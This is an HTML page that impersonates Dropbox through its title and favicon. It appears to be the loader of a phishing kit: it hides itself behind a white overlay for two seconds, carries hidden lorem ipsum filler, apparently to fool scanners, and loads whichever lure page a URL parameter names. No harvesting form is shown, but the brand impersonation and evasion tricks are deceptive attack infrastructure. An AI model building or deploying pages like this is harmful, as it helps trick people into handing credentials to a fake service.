<!DOCTYPE html>
<html>
<head>
<title>Dropbox</title>
<link rel="icon" href="images/favicon-db.ico">
<style>

.overlay_xyrqwerty{
  position: fixed;
  top: 0;
  left: 0;
  z-index: 2000;
  background: #ffffff;
  width: 100%;
  min-width: 100%;
  height: 100%;
  min-height: 100%;
}
</style>
</head>
<body>
<div class="overlay_xyrqwerty"></div>
<div class="mainallpppppp" data-tt=""></div>

<div style="display: none;">
<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
   <script>
     $(document).ready(function(e){ 
	   
	   //$(document).attr("title", "New Title");
	   setTimeout(function(){ 
	     $(".overlay_xyrqwerty").hide(); 
	   }, 2000);
	   var acname = 'accountname';
	   var styletype = 'styletypefk';
	   var param = GetURLParameter('t');
	   var url = 'index-home.html';
	   if(param){ url=param+'.html'; }
	   $.get(url, function(data, status){
           $('.mainallpppppp').html(data);
		   $(document).attr("title", $('.mainallpppppp title').html());
	   });
	 });
	 
	 function GetURLParameter(sParam)
{
var output = false;
    var sPageURL = window.location.search.substring(1);
    var sURLVariables = sPageURL.split('&');
    for (var i = 0; i < sURLVariables.length; i++)
    {
        var sParameterName = sURLVariables[i].split('=');
        if (sParameterName[0] == sParam)
        {
            output = decodeURIComponent(sParameterName[1]);
        }
    }
	return output;
}
	</script>
</body>
</html>